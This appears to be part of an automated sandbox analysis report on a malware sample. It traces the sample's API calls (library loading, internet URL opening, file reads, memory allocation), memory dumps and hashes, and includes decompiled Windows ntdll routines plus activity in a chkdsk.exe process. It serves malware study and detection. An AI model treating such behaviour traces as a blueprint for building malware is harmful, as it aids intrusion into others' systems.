                                                          • Instruction Fuzzy Hash: 12115071204B42AFE7109B14CC96FA97BA8FF0B3A0F6582A5ED228B1D2D772D841C611
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005621D0, Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • TerminateThread.KERNELBASE(000000FE,00000000), ref: 00562210
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: TerminateThread
                                                          • String ID:
                                                          • API String ID: 1852365436-0
                                                          • Opcode ID: 5f5adb00daae3d2305441583e4e6f384ffca272559583464cf2374f9133a4c4e
                                                          • Instruction ID: eeafa5a3d6d3bbb10ca0573cdb1d8794eddfcf5b48f86deab7c94ded040bf377
                                                          • Opcode Fuzzy Hash: 5f5adb00daae3d2305441583e4e6f384ffca272559583464cf2374f9133a4c4e
                                                          • Instruction Fuzzy Hash: D7110D70200706AFEB149E14CDD6BAA7BF9FF5A360F658261ED128B1E1D771CC81C612
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00563224, Relevance: 1.6, APIs: 1, Instructions: 68libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LdrInitializeThunk.NTDLL(00563C34,00563EEA), ref: 00563AFE
                                                          • LoadLibraryA.KERNELBASE(?,321C9581,?,005658D3,005625D9,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00564BDB
                                                            • Part of subcall function 0056335A: InternetOpenA.WININET(00563A78,00000000,00000000,00000000,00000000,00563C34,00563EEA), ref: 0056339D
                                                            • Part of subcall function 0056335A: InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 0056343F
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InternetOpen$InitializeLibraryLoadThunk
                                                          • String ID:
                                                          • API String ID: 1998099105-0
                                                          • Opcode ID: b61568d94fd1e137dfc0c88feac44c7e16907be5113b3f980412f43d4c53c4af
                                                          • Instruction ID: aff565336db64789de18b4449dcd7dd0a41ca2d1c9d946be2ecf0ad3103d1bae
                                                          • Opcode Fuzzy Hash: b61568d94fd1e137dfc0c88feac44c7e16907be5113b3f980412f43d4c53c4af
                                                          • Instruction Fuzzy Hash: FE11383265E7D25AC733CBB089AA6437F60FF5371072C88CDC0C14B563C552AA11E796
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00565707, Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNELBASE(?,321C9581,?,005658D3,005625D9,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00564BDB
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: a1fd0485a41099bbfec233ba15de89231a5fe22c18ea4cab9150eafc161b7a8c
                                                          • Instruction ID: c610e65b818dea122ecf85fc61420edd5dc54197313f101062f7b03606462ca2
                                                          • Opcode Fuzzy Hash: a1fd0485a41099bbfec233ba15de89231a5fe22c18ea4cab9150eafc161b7a8c
                                                          • Instruction Fuzzy Hash: C5F0F694604217A9DE203A79ED157FA5AD6AFD23A0F248122BC91C30A5CB14CD9A4D12
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00564B30, Relevance: 1.5, APIs: 1, Instructions: 41libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNELBASE(?,321C9581,?,005658D3,005625D9,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00564BDB
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: cee82b9a39670ff0d5627792836e1d1327be6ddfd310c21404dc7ba1eb3b0443
                                                          • Instruction ID: c2af315da5bddaf3e51f59adb8e74c62e9be1fa57d693811626a1b1274f1d14b
                                                          • Opcode Fuzzy Hash: cee82b9a39670ff0d5627792836e1d1327be6ddfd310c21404dc7ba1eb3b0443
                                                          • Instruction Fuzzy Hash: F0F0E99860461BB9DF203B39ED557FA9AD6AFD23E0F108126BC91D30A5CB18CD9D4D12
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00564B3D, Relevance: 1.5, APIs: 1, Instructions: 41libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNELBASE(?,321C9581,?,005658D3,005625D9,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00564BDB
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: cbba32f83f6468f486736fbc5a7d28bd703c8a31a2a27df6c05f6e815deb9701
                                                          • Instruction ID: f2929f6d1dd9a9f458d3849c89b5edf1015aa20d64830bd6477ec9713042f6a2
                                                          • Opcode Fuzzy Hash: cbba32f83f6468f486736fbc5a7d28bd703c8a31a2a27df6c05f6e815deb9701
                                                          • Instruction Fuzzy Hash: DC01235A64469695DF107F24ED4575C6F91FFD23A0F288476FCA1C7096CB14C8558D01
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00564BB2, Relevance: 1.5, APIs: 1, Instructions: 17libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNELBASE(?,321C9581,?,005658D3,005625D9,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00564BDB
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 4a72ba7ee49c9f7d04ae4651d6e17dec64270956b8dacc3d75a86e69ccef4f5a
                                                          • Instruction ID: 7d455f5d2d018ce7ef22e64ac751f44c882ca2224cd69ab87cb6a38ad01318e1
                                                          • Opcode Fuzzy Hash: 4a72ba7ee49c9f7d04ae4651d6e17dec64270956b8dacc3d75a86e69ccef4f5a
                                                          • Instruction Fuzzy Hash: FFE0862B20A9E297DF109714EC86B483F50FE8337075984EDD4618B467CA22A401CB01
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00563016, Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00562FC2,0056306B), ref: 00563035
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: d096153d6e1dec5dde1e2b4d0158388e60c0405f475271c861d477d470e78e7e
                                                          • Instruction ID: 7271cf3bc3dfd9e9caca4ca5c662f4c2f622eb1dc935a70c7e9bc7887cbfefab
                                                          • Opcode Fuzzy Hash: d096153d6e1dec5dde1e2b4d0158388e60c0405f475271c861d477d470e78e7e
                                                          • Instruction Fuzzy Hash: 9FD08CB0B90700B6F6388B34CEC3FDAA20A5FD0F10F20820C7B483C1C48AF1A210C118
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 1E50967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.519670757.000000001E4A0000.00000040.00000001.sdmp, Offset: 1E4A0000, based on PE: true
                                                          • Associated: 00000003.00000002.519823197.000000001E5BB000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000003.00000002.519848532.000000001E5BF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 33b4fd3f5d2b629701995eb5ad150cf914a9d709e612c080f7776fa52bb60f69
                                                          • Instruction ID: 96a5ff88f1dc99f248ea607ed651258e9647ad81abfa63cecf9f8bd5954f0a60
                                                          • Opcode Fuzzy Hash: 33b4fd3f5d2b629701995eb5ad150cf914a9d709e612c080f7776fa52bb60f69
                                                          • Instruction Fuzzy Hash: 9EB09B719414D5C5E601E761460871B7D9177D0745F56C651E2020641E4778C0D1F6B6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 1E4F8E00, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 126timeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 44%
                                                          			E1E4F8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x1e5bd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1e5b8464; // 0x74790110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1e5b5780 & 0x00000003) != 0) {
							E1E545510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1e5b5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E1E50B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1e5b7984; // 0x862bd8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1e5b8464; // 0x74790110
					 *0x1e5bb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E1E4F9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1e5b5780 & 0x00000005) != 0) {
						_push(_t49);
						E1E545510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                          0x1e4f8e0f
                                                          0x1e4f8e16
                                                          0x1e4f8e19
                                                          0x1e4f8e1b
                                                          0x1e4f8e21
                                                          0x1e4f8e7f
                                                          0x1e4f8e85
                                                          0x1e539354
                                                          0x1e53936c
                                                          0x1e539371
                                                          0x1e53937b
                                                          0x1e539381
                                                          0x1e539381
                                                          0x1e53937b
                                                          0x1e4f8e9d
                                                          0x1e4f8e9d
                                                          0x1e4f8e29
                                                          0x1e4f8e2c
                                                          0x1e4f8e38
                                                          0x1e4f8e3e
                                                          0x1e4f8e43
                                                          0x1e4f8eb5
                                                          0x1e4f8eb9
                                                          0x1e5392aa
                                                          0x1e5392af
                                                          0x1e5392e8
                                                          0x1e5392e8
                                                          0x1e5392af
                                                          0x1e4f8eb9
                                                          0x1e4f8e45
                                                          0x1e4f8e53
                                                          0x1e4f8e5b
                                                          0x1e4f8e5f
                                                          0x1e4f8e78
                                                          0x1e4f8e78
                                                          0x1e4f8e7d
                                                          0x1e4f8ec3
                                                          0x1e4f8ecd
                                                          0x1e4f8ed2
                                                          0x1e4f8ed2
                                                          0x1e4f8ec5
                                                          0x1e4f8ec5
                                                          0x00000000
                                                          0x1e4f8e7d
                                                          0x1e4f8e67
                                                          0x1e4f8ea4
                                                          0x1e53931a
                                                          0x00000000
                                                          0x00000000
                                                          0x1e539320
                                                          0x1e4f8ea4
                                                          0x1e4f8e70
                                                          0x1e539325
                                                          0x1e539340
                                                          0x1e539345
                                                          0x1e539345
                                                          0x1e4f8e76
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          Strings
                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 1E53933B, 1E539367
                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 1E539357
                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1E53932A
                                                          • LdrpFindDllActivationContext, xrefs: 1E539331, 1E53935D
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.519670757.000000001E4A0000.00000040.00000001.sdmp, Offset: 1E4A0000, based on PE: true
                                                          • Associated: 00000003.00000002.519823197.000000001E5BB000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000003.00000002.519848532.000000001E5BF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                          • API String ID: 3446177414-3779518884
                                                          • Opcode ID: bc41021ce6a63b260628a4ac45f937e44295ea8390c37792f88d8ce27cf34cc2
                                                          • Instruction ID: 15cbbbf46773351a1e0c20d2beb58994d8b245bdbacc0b32a5fda783d074215d
                                                          • Opcode Fuzzy Hash: bc41021ce6a63b260628a4ac45f937e44295ea8390c37792f88d8ce27cf34cc2
                                                          • Instruction Fuzzy Hash: 3E414931E10271DEF7506A0D8CB8A6AF3B7BB58A54F07476BE915DF250EB706C80C681
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 1E4F645B, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 26%
                                                          			E1E4F645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x1e5bd360 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E1E50FA60( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							E1E4E2280(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E1E4DFFB0(_t72, _t82, _t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x1e5bb1e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E1E50B640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}


































                                                          0x1e4f645b
                                                          0x1e4f6463
                                                          0x1e4f646d
                                                          0x1e4f6475
                                                          0x1e4f647a
                                                          0x1e4f647e
                                                          0x1e4f6480
                                                          0x1e4f648c
                                                          0x1e4f6490
                                                          0x1e4f6495
                                                          0x1e4f6498
                                                          0x1e4f649b
                                                          0x1e4f649f
                                                          0x1e4f64a1
                                                          0x1e537c07
                                                          0x1e537c09
                                                          0x1e537c0c
                                                          0x00000000
                                                          0x1e4f64a7
                                                          0x1e4f64a7
                                                          0x1e4f64aa
                                                          0x1e537bf7
                                                          0x1e537c00
                                                          0x00000000
                                                          0x1e537bf9
                                                          0x1e537bf9
                                                          0x1e537bf9
                                                          0x1e4f64b0
                                                          0x1e4f64b0
                                                          0x1e4f64b2
                                                          0x1e4f64b2
                                                          0x1e4f64b3
                                                          0x1e4f64ba
                                                          0x1e4f6553
                                                          0x1e4f655e
                                                          0x1e4f6566
                                                          0x1e4f656c
                                                          0x1e4f6575
                                                          0x1e4f657f
                                                          0x1e4f6585
                                                          0x1e4f6588
                                                          0x1e4f6588
                                                          0x1e4f64c7
                                                          0x1e4f64cb
                                                          0x1e4f64ce
                                                          0x1e4f64d3
                                                          0x1e4f64da
                                                          0x1e4f64e5
                                                          0x1e4f64ed
                                                          0x1e4f64f1
                                                          0x1e4f64f5
                                                          0x1e4f64f6
                                                          0x1e4f64fa
                                                          0x1e4f6502
                                                          0x1e4f6503
                                                          0x1e4f6504
                                                          0x1e4f6507
                                                          0x1e4f651a
                                                          0x1e4f6524
                                                          0x1e4f6524
                                                          0x1e4f6526
                                                          0x1e4f6526
                                                          0x1e4f64aa
                                                          0x1e4f652c
                                                          0x1e4f652d
                                                          0x1e4f652e
                                                          0x1e4f6539

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.519670757.000000001E4A0000.00000040.00000001.sdmp, Offset: 1E4A0000, based on PE: true
                                                          • Associated: 00000003.00000002.519823197.000000001E5BB000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000003.00000002.519848532.000000001E5BF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: 0$0
                                                          • API String ID: 3446177414-203156872
                                                          • Opcode ID: 741baba2887ac5e3eb6d448decfec265b0716e4ecb90433bcf8b486a3b0353e8
                                                          • Instruction ID: 33ad6687c095413719cda7c8345fdb5f5bc0421e79a69543798f97c225dd9b37
                                                          • Opcode Fuzzy Hash: 741baba2887ac5e3eb6d448decfec265b0716e4ecb90433bcf8b486a3b0353e8
                                                          • Instruction Fuzzy Hash: 514139B1A087469FC340CF29C584A1ABBE5FB89714F044A6EF988DB301D771EA45CF96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 1E55FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 53%
                                                          			E1E55FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E1E50CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E1E555720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E1E555720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                          0x1e55fdda
                                                          0x1e55fde2
                                                          0x1e55fde5
                                                          0x1e55fdec
                                                          0x1e55fdfa
                                                          0x1e55fdff
                                                          0x1e55fe0a
                                                          0x1e55fe0f
                                                          0x1e55fe17
                                                          0x1e55fe1e
                                                          0x1e55fe19
                                                          0x1e55fe19
                                                          0x1e55fe19
                                                          0x1e55fe20
                                                          0x1e55fe21
                                                          0x1e55fe22
                                                          0x1e55fe25
                                                          0x1e55fe40

                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1E55FDFA
                                                          Strings
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 1E55FE2B
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 1E55FE01
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.519670757.000000001E4A0000.00000040.00000001.sdmp, Offset: 1E4A0000, based on PE: true
                                                          • Associated: 00000003.00000002.519823197.000000001E5BB000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000003.00000002.519848532.000000001E5BF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                          • API String ID: 885266447-3903918235
                                                          • Opcode ID: 00c35f244ccf81a6f89d546b22bac34515823d2df47961b4345315697556e35b
                                                          • Instruction ID: 84d0b14f4e5a9f61b6591b56416e593c85253987022d2a95a29174b4dbb5f8aa
                                                          • Opcode Fuzzy Hash: 00c35f244ccf81a6f89d546b22bac34515823d2df47961b4345315697556e35b
                                                          • Instruction Fuzzy Hash: 02F0F636500141BFD6210A95DC01F63BFAAEF84770F244716F728563D1DB62F86086F4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Analysis Process: chkdsk.exe PID: 392 Parent PID: 3440 chkdsk.exeCOMMON

                                                          Executed Functions

                                                          Function 00CF81B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,00CF3B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00CF3B87,007A002E,00000000,00000060,00000000,00000000), ref: 00CF81FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID: .z`
                                                          • API String ID: 823142352-1441809116
                                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                          • Instruction ID: d8eaaccef24d6e6c5dc20cfa8e296e272c82684084c37bdfa6cc88836970fc70
                                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                          • Instruction Fuzzy Hash: 4FF0B6B2200108ABCB48CF88DC85DEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00CF825A, Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtReadFile.NTDLL(00CF3D42,5E972F59,FFFFFFFF,00CF3A01,?,?,00CF3D42,?,00CF3A01,FFFFFFFF,5E972F59,00CF3D42,?,00000000), ref: 00CF82A5
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 3ac0272b16da68d160639065ca75a5e7e7f31996106e432eb09543461614d005
                                                          • Instruction ID: 38c37c8191df12e31f1aa17974ca20acebe08f73dd48e9f820d0bee2e6a48655
                                                          • Opcode Fuzzy Hash: 3ac0272b16da68d160639065ca75a5e7e7f31996106e432eb09543461614d005
                                                          • Instruction Fuzzy Hash: 7FF092B2210109AFCB14DF99DC95EEB77A9AF8C754F158648BA1DA7241DA30E811CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00CF8260, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtReadFile.NTDLL(00CF3D42,5E972F59,FFFFFFFF,00CF3A01,?,?,00CF3D42,?,00CF3A01,FFFFFFFF,5E972F59,00CF3D42,?,00000000), ref: 00CF82A5
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                          • Instruction ID: b67f0253bcdbebc12e9916e074d4eac590e829f033a295bf44b49f7cc6336597
                                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                          • Instruction Fuzzy Hash: 79F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158248BA1D97241DA30E8118BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00CF838A, Relevance: 1.5, APIs: 1, Instructions: 33memorynativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00CE2D11,00002000,00003000,00000004), ref: 00CF83C9
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: 0f3ca21bf496da78c539a8515d34c0f4dcabb032d58745ee95bc5d7863064939
                                                          • Instruction ID: 1457db99713b35673d94a63d5c9fe3386fc56a77c611409419bce4a922a22f74
                                                          • Opcode Fuzzy Hash: 0f3ca21bf496da78c539a8515d34c0f4dcabb032d58745ee95bc5d7863064939
                                                          • Instruction Fuzzy Hash: BDF0F8B6200108AFDB24DF99DC81EEB77A9EF98750F158258FE0997241C630E911CBE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00CF8390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00CE2D11,00002000,00003000,00000004), ref: 00CF83C9
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
